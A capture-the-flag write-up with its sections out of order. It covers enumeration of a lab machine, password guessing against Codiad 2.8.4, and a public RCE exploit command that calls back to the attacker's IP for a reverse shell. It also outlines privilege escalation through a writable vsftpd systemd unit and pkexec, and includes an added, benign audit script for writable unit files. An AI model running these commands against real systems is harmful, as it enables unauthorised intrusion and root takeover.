Exploited using https://www.exploit-db.com/exploits/49705
The .bash_history file in /home/drac contains the password for the user drac.
Observations relevant to privilege escalation from drac:
drac can run the following command with sudo – /usr/sbin/service vsftpd restart
drac can write to the vsftpd.service file – /lib/systemd/system/vsftpd.service
/etc/polkit-1/localauthority.conf.d/51-ubuntu-admin.conf contains AdminIdentities=unix-group:sudo;unix-group:admin (the Ubuntu default)
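The second observation is the one a defender can audit for directly: a systemd unit that an unprivileged user can edit, combined with a sudo rule that lets the same user restart it, hands that user root. The following audit check is added here and is not part of the original writeup; it finds unit files that are group- or world-writable or not owned by root, and the demo tree it builds (file names and contents) is constructed for illustration.

```shell
#!/bin/sh
# Added audit check (not from the original writeup): report systemd unit files
# that a non-root user could modify. Such a unit, paired with a sudo rule like
# "/usr/sbin/service vsftpd restart", is the weakness noted above.

# Print *.service files under the given directories whose group or world
# write bit is set. POSIX find syntax, so it works on GNU and BSD find.
# Usage: writable_units DIR...
writable_units() {
    find "$@" -type f -name '*.service' \
        \( -perm -020 -o -perm -002 \) 2>/dev/null | sort
}

# Print *.service files under the given directories not owned by root.
# Usage: non_root_owned_units DIR...
non_root_owned_units() {
    find "$@" -type f -name '*.service' ! -user root 2>/dev/null | sort
}

# Build a constructed example tree so the check can be exercised offline:
# one unit with the weak (world-writable) mode, one with the corrected mode.
make_demo_tree() {
    dir=$(mktemp -d)
    mkdir -p "$dir/system"
    printf '[Service]\nExecStart=/usr/sbin/vsftpd\n' > "$dir/system/vsftpd.service"
    printf '[Service]\nExecStart=/usr/sbin/sshd\n'   > "$dir/system/ssh.service"
    chmod 666 "$dir/system/vsftpd.service"   # weak: anyone can edit the unit
    chmod 644 "$dir/system/ssh.service"      # corrected: root-only write
    printf '%s\n' "$dir"
}

# Real-host usage:
#   writable_units /lib/systemd/system /etc/systemd/system
#   non_root_owned_units /lib/systemd/system /etc/systemd/system
# Pass --demo to run the check against the constructed tree instead.
if [ "${1:-}" = "--demo" ]; then
    tree=$(make_demo_tree)
    echo "Writable unit files under $tree:"
    writable_units "$tree"
    rm -rf "$tree"
fi
```

Any file the check reports should be reset to mode 0644, owner root:root, and the corresponding sudo rule reviewed, since restarting a service is only safe to delegate when the unit itself is immutable to the delegate.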
Privilege Escalation – Option 1: modifying the vsftpd service
Privilege Escalation – Option 2: pkexec
All Done!
Enumeration
Nmap and Rustscan showed that the following ports are open:
21/ftp
22/ssh
80/http
62337/http
Nmap results also revealed that anonymous login is allowed for FTP. Therefore, we logged in to FTP to see whether we could gain any useful information.
As seen in the screenshots above, we found a file named - , which contained a note to john stating that the password had been reset to the default, as requested.
We made a note of the information received above and moved onto enumerating other services.
Running GoBuster on port 80 did not turn up anything useful.
However, when browsing to port 62337, we found that the application running was Codiad 2.8.4.
Searching for exploits with searchsploit Codiad 2.8.4 showed three RCE exploits. However, all of them required authentication.
Since we needed authentication for any of the exploits to work, our main goal was to get authenticated.
Recalling the note obtained from FTP, we searched for Codiad's default credentials, with no luck.
Since the note mentioned the user john, we tried some common passwords against the user john, and one of them worked.
The password for john was password.
As we could authenticate to the application, we tried using the first exploit to get a reverse shell.
Commands Used
searchsploit -m 49705
python3 49705.py http://10.10.213.56:62337/ john password 10.9.4.47 1234 linux